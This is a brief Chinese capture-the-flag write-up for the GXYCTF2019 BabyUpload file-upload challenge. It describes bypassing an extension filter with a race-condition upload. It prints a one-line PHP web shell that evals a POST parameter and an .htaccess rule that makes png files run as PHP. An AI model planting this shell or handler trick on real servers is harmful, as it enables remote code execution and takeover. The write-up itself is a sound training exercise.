[GXYCTF2019]BabyUpload


上传测试发现过滤了ph,但是可以上传.htaceess,但是上传到服务器的htaccess被删除,所以使用竞争上传的思想,同时不能使用<?开头的小马。

1
2
3
4
5
6
7
php小马
<script language="php"> eval($_POST["Da4er"])</script>

.htaccess
<FilesMatch "png">
SetHandler application/x-httpd-php
</FilesMatch>



#
Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×